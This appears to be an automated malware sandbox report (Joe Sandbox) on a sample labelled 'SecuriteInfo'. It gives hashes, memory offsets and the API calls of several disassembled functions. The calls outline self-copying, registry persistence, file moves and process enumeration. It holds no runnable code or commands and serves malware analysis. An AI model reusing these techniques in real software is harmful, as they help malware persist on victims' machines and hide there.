                                                                    • Opcode ID: aecc634b9979c5af6c4143cf000a345c7578cd25ef540ff5cc2973e544d8b29f
                                                                    • Instruction ID: 08acbc43d7ab40bf74b9d37d41c4b3f18f4b56d90bb39aed35fabdee007df94d
                                                                    • Opcode Fuzzy Hash: aecc634b9979c5af6c4143cf000a345c7578cd25ef540ff5cc2973e544d8b29f
                                                                    • Instruction Fuzzy Hash: 90219D32611702AFDB359FA4E954B66B7FEBB44715F040828E2028B5A8CB70F851CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85b0acbde44a81bb7cb1afb6b657becfdbd4d165e419e9804aeb603448473713
                                                                    • Instruction ID: e6706fc98ca96d83729c0b3ee86f78bdc8b406bfa620dd9e94793e926d23cc94
                                                                    • Opcode Fuzzy Hash: 85b0acbde44a81bb7cb1afb6b657becfdbd4d165e419e9804aeb603448473713
                                                                    • Instruction Fuzzy Hash: 5711E632B60211EBDB22AAD9E8E4BAE77B9DF84394F190426F905DF155D770DC00C650
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c2e2e21c63aa764263593b7c0a868fc15949f4a4ffe602ae3a9c0973846e5cb
                                                                    • Instruction ID: 12b0f0f69b75f64b4a1a674abda63e258bf74d6fff6aae28422fb093d2c7cb6b
                                                                    • Opcode Fuzzy Hash: 0c2e2e21c63aa764263593b7c0a868fc15949f4a4ffe602ae3a9c0973846e5cb
                                                                    • Instruction Fuzzy Hash: BA115C31B657009BE725AFF4D819B2AB3A1EF90714F10411FE46A8A1D5EBB45C01CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77e5965350b223f01d0361deaae1380f0d423b054b9d4ca33ae55cc198cb21a5
                                                                    • Instruction ID: ae1e5aabfef2524fb04db296a30e1dc716f7bfba64598969995799cb4dc71302
                                                                    • Opcode Fuzzy Hash: 77e5965350b223f01d0361deaae1380f0d423b054b9d4ca33ae55cc198cb21a5
                                                                    • Instruction Fuzzy Hash: C011E732610214ABDB25ABD8ED44E7B76BDEF88751F200929F406EB210DB709D019660
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91d9519c962a58974f1b87e6f11ec1f60f4e369fe806afe671436d2f410c8956
                                                                    • Instruction ID: 28a654bf9d1561b44429646805f956f12bbc9ae7417509fb14d588b2de00cbae
                                                                    • Opcode Fuzzy Hash: 91d9519c962a58974f1b87e6f11ec1f60f4e369fe806afe671436d2f410c8956
                                                                    • Instruction Fuzzy Hash: 5D21D272A10204EFDB11DFA4D84CFAEBBB8FF85711F144065F905AE180DBB09A04CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a5a76bf3289dd9bd41a4a437851ea88aa4c36d02d58528b430259c456fb94c03
                                                                    • Instruction ID: 940de9f970163297147c79d04d7d3c0b53f88fbc26c374fd881bd24196d08615
                                                                    • Opcode Fuzzy Hash: a5a76bf3289dd9bd41a4a437851ea88aa4c36d02d58528b430259c456fb94c03
                                                                    • Instruction Fuzzy Hash: 1411B6B1E001697BDB019A99CC50EFF7B6DFB84394F14416BBD25E7280DB70CA008BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecacf98bf88639497f7fa2bb94287b964fba82bcbe6c2711f040655cc60b5c1c
                                                                    • Instruction ID: 5b5e6680e649ced56cbe94308f9b8c11e7460f779099a3f7902f1d8ba27a850b
                                                                    • Opcode Fuzzy Hash: ecacf98bf88639497f7fa2bb94287b964fba82bcbe6c2711f040655cc60b5c1c
                                                                    • Instruction Fuzzy Hash: F9F0E936851703DAF733569CDC88BD2F797EF91728F140419E944165A4C3B2A882C552
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf538a628dea5b99fb983a1ff084c4624ced65eaecb310d7a9454ab4ce14ee23
                                                                    • Instruction ID: d802108556a6ac0327dfee48fb34b33719ef28d5210d6b2428f6a696b06d1b42
                                                                    • Opcode Fuzzy Hash: cf538a628dea5b99fb983a1ff084c4624ced65eaecb310d7a9454ab4ce14ee23
                                                                    • Instruction Fuzzy Hash: C1E05C36951404D7C7221684AC0CB927B99DBC1770F350238F9184B190D7B0CC11DE90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1397f6501aa7739e1067e414a4f51296d0e1d2937a2423d8218ed9735387a05
                                                                    • Instruction ID: a529ebb908861d6bfdd5c5194b85faa3cd0f3a01febfa64dbb24823657f5e502
                                                                    • Opcode Fuzzy Hash: c1397f6501aa7739e1067e414a4f51296d0e1d2937a2423d8218ed9735387a05
                                                                    • Instruction Fuzzy Hash: 80E0E531AA1250EBCF312BE1EC09B573A99FF14671F110428B516DA050C2A1D810E694
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f7f187e9adaf6646294997c5070b3ecb9d17216d7a2d258a11d1ec40902e0d
                                                                    • Instruction ID: c45fee9c4a3271f1918bbbf1c0007969702261f079be2f092a68d2cd31aa9e9d
                                                                    • Opcode Fuzzy Hash: e1f7f187e9adaf6646294997c5070b3ecb9d17216d7a2d258a11d1ec40902e0d
                                                                    • Instruction Fuzzy Hash: 99F0A032591610EBC7326F80D914F5277B5FB80F20F160919F5491F960C3B1EC02DB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52bcfde4f5c36d13a126fbfaaec46efc2ab6e0e7abf1b0bda67482009ffc3936
                                                                    • Instruction ID: 7609b839c735f1d04785d04efec83da9b50242f046ccb4f88b425f82bc2d95ea
                                                                    • Opcode Fuzzy Hash: 52bcfde4f5c36d13a126fbfaaec46efc2ab6e0e7abf1b0bda67482009ffc3936
                                                                    • Instruction Fuzzy Hash: B9F0E536011701DBC772AB89E878B56B7B1EF50B29F17051AE4160F8B4DB70E850DE40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3cf96e72bf1f8665278fabd137c30e5a3815c4a103f26a0eade52bfc08757279
                                                                    • Instruction ID: 28da9cee4de3e02cab1042e740bad4533edf58c752560b5a0dfca51167b367f9
                                                                    • Opcode Fuzzy Hash: 3cf96e72bf1f8665278fabd137c30e5a3815c4a103f26a0eade52bfc08757279
                                                                    • Instruction Fuzzy Hash: 4FE02672510105FBEF18EB81CD16EEA77BDEB80758F10015CF5061A190E6B1EE02DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9572d4499638a384505f72f23a9bc00cf9f506225c4ea7f0746315c196fa374
                                                                    • Instruction ID: fdda0a1ebafc29858eacf8cf7d8fbc8141a9cedbe479ab029e664679e165d3a0
                                                                    • Opcode Fuzzy Hash: d9572d4499638a384505f72f23a9bc00cf9f506225c4ea7f0746315c196fa374
                                                                    • Instruction Fuzzy Hash: 59E01237651154ABC7225F45D808F4ABBB9EB84B61F168065F9099B220C630ED11CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00cc7bd3c8cb51faca7aaec266f0b64fe06160b52ecf9475340202f98210c3a5
                                                                    • Instruction ID: 72fe32729ee890e8f8493191c7d1fc74ef1e4d54ea4852f52f0ced67fca763de
                                                                    • Opcode Fuzzy Hash: 00cc7bd3c8cb51faca7aaec266f0b64fe06160b52ecf9475340202f98210c3a5
                                                                    • Instruction Fuzzy Hash: 84E06D35801A01DFC7325F4AE908923FBF8FBC0B21305C92EE56A46A28C730A881DF40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcf163cb4427abcb7cf1e28c2c535b2182b2ccb3bfc9805e171924cbf72d3aba
                                                                    • Instruction ID: 44fb36bb4c12e3f7b20d930471aa379de703d22cc5b8b1b2e7e8a089ef83473c
                                                                    • Opcode Fuzzy Hash: bcf163cb4427abcb7cf1e28c2c535b2182b2ccb3bfc9805e171924cbf72d3aba
                                                                    • Instruction Fuzzy Hash: FBD05B331111247BC725DECADC04DD3BFADFF897A0B014059B51C871108530D810D7E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 22105d1506419b2c0129ebc3dafaa3a9a413de99d9396e90ffea5a4bce60e796
                                                                    • Instruction ID: 82a895e21cc634a6ad259a7c0e4531d945cd9d394dba9894b6a40f7d686ccfb6
                                                                    • Opcode Fuzzy Hash: 22105d1506419b2c0129ebc3dafaa3a9a413de99d9396e90ffea5a4bce60e796
                                                                    • Instruction Fuzzy Hash: 69E08C32522602CFCF3AAF84D508B6277E1EF44B25F09442DE596068E4C7B0D984CA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27ed15e8ebd261a986b18739fd87f69064e5f4c341f4740d4a130b88b50e07ab
                                                                    • Instruction ID: a5960de4cf17dd3b0a9f79f945068c1ce8d00a101c0abfde3528a3c9e2b19d99
                                                                    • Opcode Fuzzy Hash: 27ed15e8ebd261a986b18739fd87f69064e5f4c341f4740d4a130b88b50e07ab
                                                                    • Instruction Fuzzy Hash: 3BD01731311208DFCB02AF98DA81AADB3B1FB08794F500066E502A76A5C634ED00CF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d009c795e1b5b56f8cfbd45d1513fd4e2268b6e334f0bec6c96cf9d0e05136cc
                                                                    • Instruction ID: 77a5a7ce7d5c5905ccb011330327f5a4cd5829a615c8b907a8115606417732ff
                                                                    • Opcode Fuzzy Hash: d009c795e1b5b56f8cfbd45d1513fd4e2268b6e334f0bec6c96cf9d0e05136cc
                                                                    • Instruction Fuzzy Hash: F3D05B3229125497C7356A89A908FC17FD9DB54760F254025BA049B560C6F0A851D7D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d79b4b9385bb34c374dae32fc7f6d59ba88ca4b053b9d620c1b629d5fb575e66
                                                                    • Instruction ID: dce27d0525bddae774bfb5e5259ffcda1ddf084b90d73988d921636278647e65
                                                                    • Opcode Fuzzy Hash: d79b4b9385bb34c374dae32fc7f6d59ba88ca4b053b9d620c1b629d5fb575e66
                                                                    • Instruction Fuzzy Hash: 30D017B7A25B54CFDB259B88951179DB7B4F784B61F10466AD412A76C0D3791A008B80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bd4aefbcc3b2da2f08434f529dd0310ea7ab3d224dff40342c7716d2d2ead33
                                                                    • Instruction ID: 1edb78a912b6815bf66167f0339bf4b9f63060d518ede726d700aea8ce117739
                                                                    • Opcode Fuzzy Hash: 5bd4aefbcc3b2da2f08434f529dd0310ea7ab3d224dff40342c7716d2d2ead33
                                                                    • Instruction Fuzzy Hash: 3DD0C932451050EFC726AB98FC08F8637ACEB8D710B160961B105DB220CA78EC11DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6be6ea28273fe25021f120ac0898516ca69278bcd5583109d73eff6ab162cb52
                                                                    • Instruction ID: 5581b143c1023cf1105bb37492a057d5cd3c53d6e6c98883579062e4fef1fada
                                                                    • Opcode Fuzzy Hash: 6be6ea28273fe25021f120ac0898516ca69278bcd5583109d73eff6ab162cb52
                                                                    • Instruction Fuzzy Hash: 57C01232A629428AEF157B60D94871233E8A700A06F050465A001C50E4D724C581E514
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b8899d4beaf254aaddf334fb512213079ee1abaae6715c9614e0507c0eaeb0e
                                                                    • Instruction ID: 4f28ab583ebfdfe581a443a1273ac3f99889a22ccb042f14be1df2d34687d367
                                                                    • Opcode Fuzzy Hash: 3b8899d4beaf254aaddf334fb512213079ee1abaae6715c9614e0507c0eaeb0e
                                                                    • Instruction Fuzzy Hash: 71D01232181648EBCB366F84E909FA57BA9E764760F158020B6080A5B0C775D9A0DA84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6decd825ab2b0d03fc4b9d5e81c8334116ede9b199049ddf32b2fdf77523e62
                                                                    • Instruction ID: 2fadcb9b8d6f5e7c2c3156a02e9a4168ac71070aaa0be896ca6d9c56d40cb01a
                                                                    • Opcode Fuzzy Hash: e6decd825ab2b0d03fc4b9d5e81c8334116ede9b199049ddf32b2fdf77523e62
                                                                    • Instruction Fuzzy Hash: F1D0C971C52557DFCF32AA95CA48BEAB6B4AF04799F094464E5146506483346540DF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                    • Instruction ID: 3a1f6abad644aa62d9c7aaf17028e7a35afd8b3c7ebe03891e621acd82231ac6
                                                                    • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                    • Instruction Fuzzy Hash: 38C08C30280A009BEB226B22CD01B013AA1BB51B06F4404A06308E90F0CB78D816DA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 519e30a5a2cf0e67232b1f23451a07e3a33789783c306786d402c2434024a78e
                                                                    • Instruction ID: 2dc07a6a4b60047cb16c6752faeb97cc2442787e5425c72046161ea74d76b5e0
                                                                    • Opcode Fuzzy Hash: 519e30a5a2cf0e67232b1f23451a07e3a33789783c306786d402c2434024a78e
                                                                    • Instruction Fuzzy Hash: 2FC01231892440DFCF625F94ED1DE467AB5FB94B10F150558B0054513497718850DA00
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 004115FC
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00411607
                                                                    • PostThreadMessageA.USER32(00000000), ref: 0041160E
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041161E
                                                                      • Part of subcall function 004115AF: CoInitialize.OLE32(00000000), ref: 004115B8
                                                                      • Part of subcall function 004115AF: CoCreateGuid.COMBASE(?), ref: 004115C2
                                                                      • Part of subcall function 004115AF: _snprintf.MSVCRT ref: 004115DC
                                                                      • Part of subcall function 004115AF: CoUninitialize.COMBASE ref: 004115E5
                                                                    • CreateThread.KERNEL32(00000000,00000000,100094E6,00000000,00000000,00000000), ref: 004116DD
                                                                    • Sleep.KERNEL32(000F4240), ref: 004116ED
                                                                    • ExpandEnvironmentStringsA.KERNEL32(100131B8,?,00000104), ref: 0041175B
                                                                    • strlen.MSVCRT ref: 00411782
                                                                    • strlen.MSVCRT ref: 0041179B
                                                                    • _mbscat.MSVCRT ref: 004117B4
                                                                    • _mbscat.MSVCRT ref: 004117C4
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 004117D9
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 004117EE
                                                                    • Sleep.KERNEL32(000001F4), ref: 00411822
                                                                    • CreateThread.KERNEL32(00000000,00000000,100093AC,00000000,00000000,00000000), ref: 00411883
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004118AB
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 004118BD
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,10013EE8,00000000,000F003F,?), ref: 004118D7
                                                                    • RegSetValueExA.ADVAPI32(?,100145A0,00000000,00000001,?,00000050), ref: 004118F2
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004118FB
                                                                    • Sleep.KERNEL32(000F4240), ref: 0041190B
                                                                    • sprintf.MSVCRT ref: 00411941
                                                                    • lstrlen.KERNEL32(?), ref: 0041199A
                                                                    • memset.MSVCRT ref: 004119E2
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004119F3
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002B,00000000), ref: 00411A04
                                                                    • MoveFileA.KERNEL32(?,?), ref: 00411A47
                                                                    • memset.MSVCRT ref: 00411A56
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00411A67
                                                                    • ExitProcess.KERNEL32 ref: 0041182E
                                                                      • Part of subcall function 0041209F: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                      • Part of subcall function 0041209F: _beginthreadex.MSVCRT ref: 004120D6
                                                                      • Part of subcall function 0041209F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                      • Part of subcall function 0041209F: CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A8F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411A96
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411ABD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411AC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateModuleNameThread$HandleObjectSingleSleepWait$CopyMessage_mbscatmemsetstrlen$CurrentEnvironmentEventExitExpandFolderGuidInitializeInputMoveOpenPathPostProcessSpecialStateStringsUninitializeValue_beginthreadex_snprintflstrlensprintf
                                                                    • String ID: %$C$G$Rsjshd fzfgkqcm$\$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 1330378773-434793907
                                                                    • Opcode ID: 38b080db33efb3038d56c8d4034df92c0bf0f0d8651088bdd00c663a71e80371
                                                                    • Instruction ID: 162d77de2292474d7f8d6707a30e614de1a74aa1ac54c6ec843b9a24d7d8244d
                                                                    • Opcode Fuzzy Hash: 38b080db33efb3038d56c8d4034df92c0bf0f0d8651088bdd00c663a71e80371
                                                                    • Instruction Fuzzy Hash: 02D163B1C0425CBBEB10E7A48C88EEF7B7CEB05344F0441A6F605A6156DB799F88CB65
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10009826,?,?,75A78400,00000000), ref: 1000A4F7
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1000A4FE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000128), ref: 1000A512
                                                                    • Process32First.KERNEL32(?,00000000), ref: 1000A521
                                                                    • _strcmpi.MSVCRT ref: 1000A531
                                                                    • Process32Next.KERNEL32(?,00000000), ref: 1000A544
                                                                    • lstrcmpiA.KERNEL32(00000024,?), ref: 1000A554
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A55D
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000A564
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process32$??2@??3@AddressCloseFirstHandleLibraryLoadNextProc_strcmpilstrcmpi
                                                                    • String ID: .$2$2$3$3$C$E$E$K$KERNEL32.dll$L$N$R$S$T$a$a$d$e$e$e$h$h$l$l$l$l$n$o$o$o$p$p$r$s$t$t
                                                                    • API String ID: 3812609237-889578591
                                                                    • Opcode ID: 40b1ad887007fb4ee152f169d4ef71607621b84fcc169c244ff2be38619ab5b2
                                                                    • Instruction ID: ba2bc44bdaa4dbc0aa0ab587657f0c164c7b9ca9e2f38cf02ca266cea0b859b5
                                                                    • Opcode Fuzzy Hash: 40b1ad887007fb4ee152f169d4ef71607621b84fcc169c244ff2be38619ab5b2
                                                                    • Instruction Fuzzy Hash: 1D414220C0C6D9DDFB02D7A8C848BDEBFB55F27748F084189D1847A282C7BA5658C77A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
